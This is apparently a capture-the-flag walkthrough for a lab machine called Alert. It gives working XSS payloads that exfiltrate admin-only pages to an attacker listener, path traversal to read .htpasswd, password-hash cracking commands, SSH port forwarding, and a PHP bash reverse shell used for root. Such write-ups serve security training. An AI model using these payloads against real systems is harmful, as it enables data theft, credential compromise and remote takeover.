Alert

With nmap we will check which ports are open and which services are running.

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.3
6.72 -oG allPorts

nmap -sCV -p22,80 10.129.36.72 -oN target

Alert 1
 We can see that in port 80, in the second line, the URL of the HTTP service
appears, so we are going to add it to the /etc/hosts file together with the IP to be
able to open the page.

sudo nano /etc/hosts

We are going to search for subdomains with a status code other than 301 using
the wfuzz tool.

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1
million-20000.txt -H "Host: FUZZ.alert.htb" http://alert.htb/
| grep -v "301"

Alert 2
 We see that we find a subdomain, which must also be added to the /etc/hosts file
as statistics.alert.htb.
On the page that is on port 80, we can upload Markdown (.md) files and send a
request to the administrator.

After searching, we found that we can execute some actions using the Markdown
file. Also, if we upload the file and press the share button, we can send the file link
to the administrator and he will open it.

We can check that it works with a JavaScript alert:

<!-- XSS with regular tags -->

<script>alert(1)</script>
<img src=x onerror=alert(1) />

We can try to obtain information from one of the routes to which we do not have
access, such as messages.

Alert 3
 <script>
fetch("http://alert.htb/messages/")
.then(response => response.text())
.then(data => {
return fetch("http://IP:4444/", {
method: "POST",
body: data
});
})
.then(response => response.text())
.then(result => {
console.log(result);
})
.catch(error => {
console.error('Error:', error);
});
</script>

What we are going to do is to try to make the administrator open the file for us and
send us the content, using the previous code and with nc receive the answer.

After uploading the file, what we do is to hit 'Share' and copy the URL and then
prepare Netcat and send the request to the administrator.

nc -lvnp 4444

Alert 4
 But it tells us the same thing: that we don't have permissions.

If we Google default configuration files for an Apache server, we find the following
path: /etc/apache2/sites-enabled/000-default.conf. So, let's repeat the above,
changing the path to a PHP file called messages.php, followed by the
configuration file.

<script>
fetch("http://alert.htb/messages.php?file
=../../../../../../../../etc/apache2/sites-enabled/000-defaul
t.conf")
.then(response => response.text())
.then(data => {
return fetch("http://IP:4444/", {
method: "POST",
body: data
});
})
.then(response => response.text())
.then(result => {
console.log(result);
})
.catch(error => {
console.error('Error:', error);

Alert 5
 });
</script>

We see that there is a path to what could be a file with passwords called
.htpasswd. So, let's do the same process, but with this new file:
http://alert.htb/messages.php?file=../../../var/www/statistics.alert.htb/.htpasswd

And we get a file in which, apparently, there is a user with his hash. If you want to
know what kind of hash it is, you can search for 'Hash Identifier' and paste it to
decrypt it. Let's use the following command:

hashcat -m 1600 -a 0 pass.txt /usr/share/wordlists/rockyou.tx

t

john --format=md5crypt-long --wordlist=/usr/share/wordlists/r

ockyou.txt hash.txt

We connect as Albert via SSH.

ssh albert@IP

Once inside the system, we can observe two things. If we use the command id,
we will see that our user belongs to a peculiar group: uid=1000(albert),
gid=1000(albert), groups=1000(albert), 1001(management).

Using the following command, we can search for all the files that have to do with
that specific group. The output of the above command reports that our user has
full permissions on /opt/website-monitor/config/configuration.php.

find / -type f -group management 2>/dev/null

Alert 6
 From the absolute path of the file, we can infer that there is another local web
service (since it was not reported in our nmap scan).
We see the internal ports listening with netstat -tuln:

If we use ps aux, we can see that the service is running as root, so we proceed
with port forwarding (make sure that your port {port} is not in use).

ssh -L {port}:localhost:8080 albert@IP

After reviewing /opt/website-monitor/config/configuration.php in more detail, it

turns out that our user has full permissions over the entire /config folder. Judging
by the simplicity of the application, we should be able to access any file within the
/website-monitor directory. With our write permissions on the /config folder, we
can create a file with a PHP revshell hosted in that folder to get a shell as root.

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/{IP}/{PORT} 0>&

1'"); ?>

To activate the .php file, it is only necessary to enter its path in the browser:

http://localhost:{port}/config/payload.php.

Alert 7